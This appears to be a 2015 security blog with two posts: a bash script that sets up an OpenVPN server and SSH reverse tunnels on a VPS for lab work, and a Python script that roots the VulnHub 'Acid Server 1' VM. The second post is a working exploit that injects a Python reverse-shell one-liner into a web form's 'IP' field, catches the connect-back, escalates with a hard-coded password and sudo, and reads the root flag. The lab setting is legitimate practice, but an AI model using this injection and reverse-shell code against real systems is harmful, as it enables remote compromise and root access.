Tuesday, September 29, 2015

Hacking infoseclabs in peace.



There's been a lot of talk lately on the #infoseclabs channel about how to safely browse and interact with the lab.infoseclabs.net labs. I've gathered and modified a few scripts that will turn any Ubuntu VPS (EC2, OVH, DigitalOcean) into an OpenVPN server that routes all of your traffic through it, and also configure SSH on the VPS to allow dynamic (SOCKS) and remote port forwarding.

The script to configure the server:

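#!/bin/bash
###
# Turn a fresh Ubuntu VPS into an OpenVPN server that routes all client
# traffic through it, and let sshd bind remote-forwarded (-R) ports.
# Must run as root; keys, certs and configs are written to /etc/openvpn
# and the finished client profile is printed at the end.
###
set -e
if [[ $EUID -ne 0 ]]; then
    echo "You must be a root user" 1>&2
    exit 1
fi
###
# Allow for ssh socks proxies and port forwarding
# sshd reads /etc/ssh/sshd_config (the original /etc/sshd_config path matched
# nothing, so GatewayPorts was never changed). "GatewayPorts yes" binds every
# -R port on all interfaces of the VPS, so whatever is tunnelled to it is
# reachable from the Internet; "GatewayPorts clientspecified" lets each
# ssh -R choose its own bind address instead.
###
sed -i.bak 's/#GatewayPorts no/GatewayPorts yes #Proxy/g' /etc/ssh/sshd_config
service ssh restart
###
# Script to set up OpenVPN for routing all traffic.
# https://github.com/tinfoil/openvpn_autoconfig
###
apt-get update -q
debconf-set-selections <<EOF
iptables-persistent iptables-persistent/autosave_v4 boolean true
iptables-persistent iptables-persistent/autosave_v6 boolean true
EOF
apt-get install -qy openvpn curl iptables-persistent
cd /etc/openvpn
# Private material is created with restrictive permissions from the start
# instead of being chmod'ed after it already exists world-readable.
umask 077
# Certificate Authority (self-signed, valid one year). It only ever signs
# the two certs below; ca-key.pem never needs to leave this host.
>ca-key.pem openssl genrsa 2048
>ca-csr.pem openssl req -new -key ca-key.pem -subj /CN=OpenVPN-CA/
>ca-cert.pem openssl x509 -req -in ca-csr.pem -signkey ca-key.pem -days 365
>ca-cert.srl echo 01
# Server Key & Certificate
>server-key.pem openssl genrsa 2048
>server-csr.pem openssl req -new -key server-key.pem -subj /CN=OpenVPN-Server/
>server-cert.pem openssl x509 -req -in server-csr.pem -CA ca-cert.pem -CAkey ca-key.pem -days 365
# Client Key & Certificate (a single shared client identity; "duplicate-cn"
# in the server config lets several devices use it at the same time)
>client-key.pem openssl genrsa 2048
>client-csr.pem openssl req -new -key client-key.pem -subj /CN=OpenVPN-Client/
>client-cert.pem openssl x509 -req -in client-csr.pem -CA ca-cert.pem -CAkey ca-key.pem -days 365
# Diffie hellman parameters
>dh.pem openssl dhparam 2048
chmod 600 *-key.pem
# Set up IP forwarding and NAT for iptables
>>/etc/sysctl.conf echo net.ipv4.ip_forward=1
sysctl -p
# Masquerade out of whichever interface carries the default route; the
# original hard-coded eth0, which newer Ubuntu images no longer use.
WAN_IF=$(ip route show default 2>/dev/null | awk '{for (i = 1; i < NF; i++) if ($i == "dev") {print $(i+1); exit}}')
WAN_IF=${WAN_IF:-eth0}
iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o "$WAN_IF" -j MASQUERADE
>/etc/iptables/rules.v4 iptables-save
# Write configuration files for client and server
SERVER_IP=$(curl -s4 canhazip.com || echo "<insert server IP here>")
# Not hardened: no tls-auth/tls-crypt, no explicit "cipher" line (OpenVPN 2.3
# falls back to BF-CBC), and the certs above carry no extendedKeyUsage, so the
# client cannot enable "remote-cert-tls server" unless they are regenerated
# with proper extensions. "comp-lzo" compresses the tunnel, which is a known
# information-leak vector for encrypted traffic; drop it on both sides if
# bandwidth is not a concern.
>tcp443.conf cat <<EOF
server 10.8.0.0 255.255.255.0
verb 3
duplicate-cn
key server-key.pem
ca ca-cert.pem
cert server-cert.pem
dh dh.pem
keepalive 10 120
persist-key yes
persist-tun yes
comp-lzo yes
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"
# Normally, the following command is sufficient.
# However, it doesn't assign a gateway when using
# VMware guest-only networking.
#
# push "redirect-gateway def1 bypass-dhcp"
push "redirect-gateway bypass-dhcp"
push "route-metric 512"
push "route 0.0.0.0 0.0.0.0"
user nobody
group nogroup
proto tcp
port 443
dev tun443
status openvpn-status-443.log
EOF
>client.ovpn cat <<EOF
client
nobind
dev tun
redirect-gateway def1 bypass-dhcp
remote $SERVER_IP 443 tcp
comp-lzo yes
<key>
$(cat client-key.pem)
</key>
<cert>
$(cat client-cert.pem)
</cert>
<ca>
$(cat ca-cert.pem)
</ca>
EOF
service openvpn restart
# The profile embeds the client private key: copy it over a trusted channel
# and treat it like a password.
cat client.ovpn
cd -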

A wrapper script to easily set up reverse SSH tunnels:


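#!/usr/bin/env bash
###
# Wrapper script so I don't have to remember all of the flags.
# If you want this to go smoothly use ssh-copy-id to copy your public key to the VPS.
#
# Usage: tunnel.sh [-v] -l <local port> -r <remote port>
# Keeps "ssh -R <remote>:localhost:<local>" alive to the VPS: restarts it
# whenever it is gone, and recycles it every fifth check (~2.5 h).
# NOTE: with "GatewayPorts yes" on the VPS the forwarded port is bound on
# every interface of the VPS, i.e. the local service becomes reachable from
# the Internet. Use "-R 127.0.0.1:${remote_port}:localhost:${local_port}"
# (with GatewayPorts clientspecified) to keep it on the VPS loopback only.
###
HOST="<Proxy IP>"
SSH_USER="root"
verbose=false
# "v" was missing from the optstring, so -v was rejected by getopts.
while getopts 'vl:r:' flag; do
    case $flag in
        v ) verbose=true;;
        l ) local_port=$OPTARG;;
        r ) remote_port=$OPTARG;;
        * ) ;;
    esac
done
shift $((OPTIND-1)); OPTIND=1
usage="$(basename "$0") [-v] -l <22> -r <19999>"
if [[ -z $local_port || -z $remote_port ]]; then
    echo "$usage"
    exit 1
fi
# ExitOnForwardFailure: without it ssh stays connected even when the remote
# port is still held by a dying predecessor, so pgrep sees a "running" tunnel
# that forwards nothing. ServerAliveInterval lets a dead link fail instead of
# hanging until the next forced kill. The exact string doubles as the
# pgrep/pkill -f pattern below, so keep it unique.
cmd="ssh -f -N -T -o ExitOnForwardFailure=yes -o ServerAliveInterval=60 -R ${remote_port}:localhost:${local_port} ${SSH_USER}@${HOST}"
trap "{ pkill -f \"$cmd\" ; exit 0 ; }" SIGINT
x=0
while true; do
    x=$((x+1))
    # if the ssh command isn't running, run it
    if ! pgrep -f "$cmd" >/dev/null; then
        $verbose && echo "starting: $cmd"
        $cmd
    fi
    sleep 30m
    # kill off the ssh connection every so often
    if (( x % 5 == 0 )); then
        pkill -f "$cmd"
        sleep 10
        pkill -9 -f "$cmd"
        sleep 10
    fi
done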

Friday, August 21, 2015

Everybody Loves Acid.. Acid Server 1, of course!

I've written a script which will root a fresh version of Acid ( https://www.vulnhub.com/entry/acid-server-1,125/).  It is pretty easy to follow along and finishes with a root shell.



from urllib import urlencode
import urllib
import urllib2
import socket
import sys
import threading
import time
# Target VM (rhost:rport) and the address the shell connects back to
# (lhost:lport). All four are hard-coded for one lab network.
rhost = "192.168.12.131"
rport = 33447
lhost = "192.168.12.129"
lport = 4444
# Value POSTed in the "IP" field of low.php: a leading "1;" followed by a
# python one-liner that opens a TCP connection to lhost:lport and wires
# /bin/sh to it. lhost/lport are interpolated into the one-liner here.
revcmd = '1;python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%d));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\'' % (lhost,lport)
postfields= {
'submit' : 1337,
'IP' : revcmd,
}
url = 'http://%s:%d/Challenge/Magic_Box/low.php' % ( rhost, rport)
# Listening socket, shared as a module global; bound and accepted in rev_hndlr().
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 10 s timeout on the listener, so accept() raises socket.timeout if nothing
# connects back in time. Whether the accepted client socket inherits it
# depends on the Python version -- verify before relying on it.
s.settimeout(10)
def get_all_response(client):
    """Read whatever the remote shell has sent so far, print it and return it.

    Reads 100-byte chunks and stops at the first chunk shorter than 100 bytes
    (or an empty read). Output that happens to arrive in exact 100-byte
    pieces, or that arrives after this returns, is left for the next call;
    the 0.5 s sleep is the only synchronisation with the remote command.
    """
    time.sleep(.5)  # give the remote end half a second to produce output
    recv_len = 1
    response = ""
    while recv_len:
        # blocks until data arrives (or a socket timeout, if one is set on client)
        data = client.recv(100)
        recv_len = len(data)
        response+= data
        #print recv_len
        if recv_len < 100:
            break
    print response
    return response
def loop_me(client):
    """Interactive loop: send each line typed locally to the shell, print the reply.

    Ends when the user types exactly "exit"; that line is still sent to the
    remote shell (and its response read) before the function returns.
    """
    print "dropping into root shell"
    inpt = ""
    while (inpt != "exit"):
        inpt = raw_input("> ")
        client.send(inpt+"\n")
        get_all_response(client)
def rev_hndlr():
    """Listen on lhost:lport, accept the connect-back shell and walk it to root.

    Runs in its own thread (started by main) while the main thread sends the
    HTTP request that triggers the connect-back. Each step is fire-and-forget:
    a line is written, then whatever the shell produced after a 0.5 s sleep is
    read by get_all_response(). Nothing checks that the expected prompt
    actually appeared, so a slow VM can desynchronise the sequence.
    The user/password pair is specific to this VulnHub image and is
    hard-coded (and echoed to the console) below.
    """
    client_sock = False
    #Bind socket to local host and port
    try:
        s.bind((lhost, lport))
    except socket.error as msg:
        # Python 2 socket.error is indexable: (errno, strerror)
        print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
        # SystemExit only ends this thread; main() is not joined and still
        # sends the request, with nothing listening for the shell.
        sys.exit()
    print 'Socket bind complete'
    #Start listening on socket
    s.listen(10)
    print 'Socket now listening'
    # accept() returns a socket object, which is truthy, so this runs once
    while not client_sock:
        client_sock, addr = s.accept()
    print "[==>] Received incoming connection from %s:%d" % (addr[0],addr[1])
    get_all_response(client_sock)
    # upgrade the dumb /bin/sh to a pty-backed bash so su/sudo can prompt
    client_sock.send("python -c 'import pty;pty.spawn(\"/bin/bash\") '\n")
    get_all_response(client_sock)
    client_sock.send("su saman\n")
    get_all_response(client_sock)
    print "1337hax0r"
    client_sock.send("1337hax0r\n")
    get_all_response(client_sock)
    client_sock.send("sudo -i\n")
    get_all_response(client_sock)
    client_sock.send("1337hax0r\n")
    print "1337hax0r"
    get_all_response(client_sock)
    client_sock.send("cat /root/flag.txt\n")
    get_all_response(client_sock)
    # hand the root shell over to the user until they type "exit"
    loop_me(client_sock)
def main():
    """Start the listener thread, then POST the form that triggers the connect-back.

    The thread is never joined. urlopen(...).read() presumably does not return
    until the injected process on the server exits, so the rev_hndlr thread
    does all the interactive work while this thread sits in read() -- verify.
    """
    rev_thread = threading.Thread(target=rev_hndlr)
    rev_thread.start()
    params = urlencode(postfields)
    print params
    print 'Params encoded'
    print 'URL (%s) opening with params (%s)' % (url,urllib.unquote(params).decode('utf8') )
    print urllib2.urlopen(url, data=params).read()
    print 'URL (%s) opened' % (url)
# No __main__ guard: importing this module runs the whole thing.
main()
I'll see if I can get some comments put in there later. Thanks @m_avinash143 it was fun!